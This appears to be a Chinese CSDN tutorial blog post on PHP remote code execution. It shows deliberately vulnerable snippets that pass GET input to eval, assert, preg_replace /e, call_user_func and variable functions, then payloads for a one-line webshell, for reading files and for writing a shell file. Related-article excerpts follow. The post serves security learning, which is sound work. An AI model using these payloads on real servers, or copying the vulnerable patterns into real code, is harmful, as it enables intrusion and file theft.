远程代码执行漏洞利用

最新推荐文章于 2024-04-16 20:35:04 发布
最新推荐文章于 2024-04-16 20:35:04 发布
阅读量363 收藏 2
点赞数
文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_l123/article/details/123205748
版权

PHP下,允许命令执行的函数有

eval()

assert()

preg_replace()

call_user_func()

$a($b)

eval()

<?php
if(isset($_GET['a'])){
	eval($_GET['a']);	
}
else{
	echo "Please input a";
}
?>

assert()

<?php
if(isset($_GET['a'])){
	assert($_GET['a']);	
}
else{
	echo "Please input a";
}
?>

 preg_replace()

<?php
if(isset($_GET['a'])){
	//Preg_replace("/\[(.*)\]/e",'\\1',$_GET['a']);	
	Preg_replace("/(.*)/e",'\\1',$_GET['a']);
}
else{
	echo "Please input a";
}
?>

 call_user_func()

<?php
if(isset($_GET['a'])){
	call_user_func($_GET['a'],$_GET['b']);
}
else{
	echo "Please input a";
}
?>

$a($b)()

<?php
if(isset($_GET['a'])&isset($_GET['b'])){
	@$a = $_GET['a'];
	@$b = $_GET['b'];
	@$a($b);//函数,可变函数
		//$a就是函数的名
		//$b就是函数的值
		//?a=assert&b=phpinfo()
		//assert(phpinfo());
}else{
	echo "Please input a&b";
}
?>

 远程命令执行漏洞利用

一句话木马

?a=@eval($_POST[cmd]);

 获取当前绝对路径

?a=print(__file__);

 读取文件

?a=var_dump(file_get_contents('D:\phpStudy2018\PHPTutorial\WWW\1.txt'));

 写shell

?a=var_dump(file_put_contents($_POST[1],$_POST[2]));
1=shell.php&2=<?php phpinfo();?>

 

Z_l123
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
代码执行漏洞
qq_63527808的博客
10-28 78
当应用在调用一些字符串转化为代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞
PHP 代码注入知识点总结
千寻的博客
02-10 2090
文章目录第一章 概述第一节 原理以及成因第二节 形成原因第三节 漏洞危害第二章 相关函数和语句第一节 eval()第二节 assert()第三节 preg_replace()第四节 call_user_func()第六节 动态函数`$a($b)`第三章 漏洞利用第一节 直接获取Shell第二节 获取当前文件的绝对路径第三节 读文件第四节 写文件第四章 防御方法 第一章 概述 第一节 原理以及...
有回显代码执行-无字母数字RCE进阶PHP5
asdfaa的博客
04-16 797
可以执行,符合正则匹配,但无法获取flag值;
[SCUCTF]2021 校赛 Web题目复现
cosmoslin的博客
04-08 1926
web 1 入门 查看headers 2 shell <?php if(isset($_GET['eval'])){ $eval = $_GET['eval']; if(!preg_match('/[0-9]|[a-z]|\^|\+|\||\$|\[|\]|\{|\}|\&|\-/i', $c)){ eval("$eval"); }else{ die("hacker??"); } }else{ highlight_file(__FILE__); } ?
php代码审计【5】代码执行漏洞
司徒荆的博客
06-16 784
代码执行漏洞
命令执行漏洞
qq_68233961的博客
10-21 1204
命令执行漏洞
泛微E-Office10远程代码执行漏洞
最新发布
05-06
泛微E-Office 10确实存在远程代码执行漏洞,这个漏洞**可能导致严重的安全后果**。 该漏洞的关键在于系统处理上传的PHAR文件时存在的缺陷。攻击者能够上传伪装的PHAR文件到服务器,利用PHP处理PHAR文件时自动进行的...
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
03-02
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
Apache Log4j2 远程代码执行漏洞检测工具
12-15
Apache Log4j2 远程代码执行漏洞检测工具,包含windows版和linux版。图形化 Apache Log4j2检测工具
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
shell >与echo造成的漏洞
line_on_database的博客
01-10 590
一、背景: 今天发现一个几十M的文件,head -10竟然好长时间没有出结果,这个文件做了什么操作呢 1.tcp持续对文件输入 tcpdump -i any -s 0 -l -w - dst port 3306 | strings > a.log 2.一小时清空一次文件 echo '' > a.log 二、现象 echo操作之后 # 发现文件大小确实为空 du -h a.log # 发现文件大小没有变为空,很大 ll -h a.log 三、解释 这个现象很奇怪,和同事讨论了一阵,觉得是
南邮 bypass again
weixin_30404405的博客
04-07 112
题目: if (isset($_GET['a']) and isset($_GET['b'])) { if ($_GET['a'] != $_GET['b']) if (md5($_GET['a']) == md5($_GET['b'])) die('Flag: '.$flag); else print 'Wrong.'; } 依...
each 1 2 amp 3 php,php:PHP7 新特性 - php学习
weixin_34353619的博客
04-09 124
PHP7.0新特性1. 组合比较符 (<=>)组合比较符号用于比较两个表达式。当$a小于、等于或大于$b时它分别返回-1、0或1,比较规则延续常规比较规则。对象不能进行比较var_dump('PHP'<=>'Node');//int(1)var_dump(123<=>456);//int(-1)var_dump(['a','b']<=&...
[wp] RCTF2019-nextphp
MercyLin的博客
09-11 1760
<?php if (isset($_GET['a'])) { eval($_GET['a']); } else { show_source(__FILE__); } 尝试利用eval ?a=echo system("ls"); system()函数被禁止了. 尝试查看phpinfo(); ?a=phpinfo(); 查看成功,在页面查找disable_function...
PHP代码注入
Marsper的博客
11-09 517
代码注入 原理以及成因 PHP代码执行(注入)(web应用方面,应用脚本在服务器执行)是指应用程序过滤不严,用户可以通过请求将代码注入到应用中执行代码执行(注入)类似于SQL注入漏洞,SQLi是将SQL语句注入到数据库中执行,而代码执行则是可以把代码注入到应用中最终由服务器运行它。这样的漏洞如果没有特殊的过滤,相当于直接有一个web后门的存在。 原因 1、程序中含有可执行PHP代码的函数或者语言结构。 2、传入第一点中的参数,客户端可控,直接修改或者影响。 漏洞危害 web 应用如果存在代码执行漏洞是一
PHP文件包含漏洞代码分析-通过漏洞getshell-学习笔记
ZhangAweio的博客
04-06 685
假设我们有一个网站有上传漏洞,但我们并不能进行直接getshell,这时候我们就用到这漏洞来进行getshell假如我们有个网站已经成功上传shell 了,但是无法运行,因为是其他格式的那么我们可以通过文件包含漏洞来进行getshell首先写入一句话木马成功访问不是PHP结尾的文件,文件包含漏洞危害及其大,如有被利用不堪设想。
iis远程代码执行漏洞
05-15
IIS远程代码执行漏洞的原因主要是由于IIS在处理某些特定类型的请求时存在漏洞,攻击者可以通过构造恶意请求来利用这些漏洞,最终导致代码执行。 为了防止IIS远程代码执行漏洞的攻击,建议管理员采取以下措施: 1....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值